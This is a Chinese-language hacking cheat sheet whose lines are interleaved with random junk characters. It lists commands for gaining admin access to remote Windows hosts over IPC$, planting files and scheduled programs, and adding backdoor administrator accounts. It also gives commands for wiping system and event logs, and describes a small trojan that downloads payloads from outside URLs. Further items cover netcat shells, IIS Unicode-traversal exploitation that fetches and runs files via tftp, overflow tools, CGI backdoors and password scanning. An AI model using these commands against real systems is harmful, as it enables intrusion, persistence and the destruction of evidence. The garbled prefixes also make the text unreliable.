网管和黑客都必须知道的命令
q>$MqKWM 常用的几条NET命令:
0[MYQl` Jb QK$[z" (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
ZZY# . K~TwyB-h (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
e&}W# IfK~~XYG (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
=-h^j Y[{:?i~9, (查看远程主机时间) net time \\IP地址
SVe]2ONd 9TW[;P2> ) (定时启动某个程序) at \\IP地址 02:18 readme.exe
D=0YLQ*rP SMEl'y (查看共享) net view \\IP地址
]`/>hH>+~9 xb,XI/ (查看netbios工作组列表) nbtstat -A IP地址
k]~o=MLmj }
oPO` (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
K^u,B3 #-0e0 (这两条把自己增加到管理员组): net user 用户名 密码 /add
3p%e_? pU$k{^'UK net localgroup Administrators 用户名 /add
sQJ\{'g u m9yO'[C (断开连接) net use \\IP地址\ipc$ /delete
'Gy`e-yB _U s" 扫尾:
F]\
Sk'}& uJw?5kEbv< del C:\winnt\system32\logfiles\*.*
lPy|>&Yc x-BU$bx5 del C:\winnt\ssytem32\config\*.evt
I/O3OD FK _ ZE> del C:\winnt\system32\dtclog\*.*
*w+'I*QSt~ +\eJxyO del C:\winnt\system32\*.log
\SWTP1 *uc/| c del C:\winnt\system32\*.txt
IO\l8G ^A$=6=CX del C:\winnt\*.txt
DrJ?bG;[ m$T5lKn}U? del C:\winnt\*.log
gHg=G+Q@ PkvW6,lS 一、netsvc.exe
;4nY{)bD >y3FU1w5d 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
>q"dLZ ingG
netsvc /list \\IP地址
{VcRur}&Y8 =zkN63S netsvc schedule \\IP地址 /query
-DI
>O/ 7he73 netsvc \\IP地址 schedule /start
1m*)MZ) EA"hie7 二、OpenTelnet.exe
W$4$%r8 Coi[cfg0 远程启动主机的Telnet服务,并绑定端口到7878,例如:
0<,{poMM mTZ/C#ir( OpenTelnet \\IP地址 用户名 密码 1 7878
6TP
/0o) 1djZ5`+ 然后就可以telnet到主机的7878端口,进入DOS方式下:
6{h\CU}" GG%b"d- telnet IP地址 7878
"#1 \ uoH e?> 三、winshell.exe
vV,TT%J8D y]db]pP5 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
FZ"n6hWA l_g$6\&| p Path (查看winshell主程序的路径信息)
q$:1Xkl RkYdK$|K b reBoot (重新启动机器)
Z-iU7 O %7#<K\]) d shutDown (关闭机器)
;UQGi}?CD %_(vSpk s Shell (执行后你就会看到可爱的“C:\>”)
FM{f{2j $ L*gtZ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
) /raTD cl& w/OJ# CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
(i~UH04r>s c4H6I~2Na 四、3389登陆器,GUI方式登录远程主机的
/Hr|u B2;P%B 五、elsave.exe
uo"<}>iJ 1&w%TRC2x 事件日志清除工具
_*mn4n= P5Xp #pa elsave -s \\IP地址 -l "application" -C
$qNF /rF IiPX`V>RC elsave -s \\IP地址 -l "system" -C
[\8rh^LFi I9X\@lTf elsave -s \\IP地址 -l "security" -C
@6;OF5VsQ `<7\Zl 执行后成功清除应用程序日志,系统日志,安全日志
$$9H1)Ny [JOa^U= 六、hbulot.exe
yGa0/o18!? (?z?/4>7< 开启win2kserver和winxp的3389服务
@%4'2b 4 &bmt hbulot [/r]
7:4c\C0 m$vq%[/# 使用/r表示安装完成后自动重起目标使设置生效。
XZE(& (s G5}_NS/ 七、nc.exe(netcat.exe)
b}!
cEJY "wcaJ;Os 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
UmR)L!QT8 8eXeb|?J 想要连接到某处: nc [-options] hostname port[s] [ports] ...
XGa8tI[:X l.}PxZ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
,6^<Vg KuR]X``2 参数:
Y@FYo>0O l2F#^=tp -e prog 程序重定向,一旦连接,就执行 [危险!!]
E !kN h '2^}de!E -g gateway source-routing hop point[s], up to 8
01.q9AGy GfONm6A -G num source-routing pointer: 4, 8, 12, ...
L3eF BF/ ,DFN:uf=l -h 帮助信息
q{w|`vIb |"*P`C= -i secs 延时的间隔
\K$\-]N+ wB)y@w4k -l 监听模式,用于入站连接
;[y( 14g gj^)T_E_ -n 指定数字的IP地址,不能用hostname
F_@B ` , EQyX! -o file 记录16进制的传输
nCYz];". =xk>yw!O) -p port 本地端口号
FGVw=G{r G&oD;NY@/ -r 任意指定本地及远程端口
m` 1dB%;? z^9oaoTl -s addr 本地源地址
o/-RGLzAo 8m0*89HEu -u UDP模式
j2G^sj"| ]]|#+$ ~ -v 详细输出——用两个-v可得到更详细的内容
=M1}HF,7>l y[7M(K -w secs timeout的时间
,
z\Qd07u ]L3U2H`7 -z 将输入输出关掉——用于扫描时
6,q0F*q 八、TFTPD32.EXE
h0F=5| B {
j_-iF 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
]xRR/S4 i!YfR]"} http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
_hY6NMw ?o(284sV3 然后可以直接令文件运行:
:!Ci#[g h,\{s_b http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
c/Pql!h+ []>rYZ9bv 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
c/$].VG0 jf)cDj2 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
^\PRzY f0P,j~] 一、一 Xscan命令行运行参数说明:
JSUD$|RiJ b%lH=u 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
!Q\*a-C 0MRWx%CR 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
!/G}vu V7WL Gy., xscan -file <主机列表文件名> <检测项目> [其他选项]
M6wH$!zRa 4q.;\n 其中<检测项目> 含义如下:
_|e&zr +.Vh<:? -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
<y7{bk~i db 99S -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
>_j(uw?u [W
)%0lx -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
3$"V,_TBZ G$,s.MSf -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
ZV{C9S& C]b:#S ${ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
k
(AE%eA ((gI OTV [其他选项] 含义如下:
T.cTL.} FWu:5fBZY -v: 显示详细扫描进度
Sfe[z=7S $7YZ;=~B -p: 跳过Ping不通的主机
P[fy |mMsU,*gB -o: 跳过没有检测到开放端口的主机
R+.4|1p cn}15JHdR -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10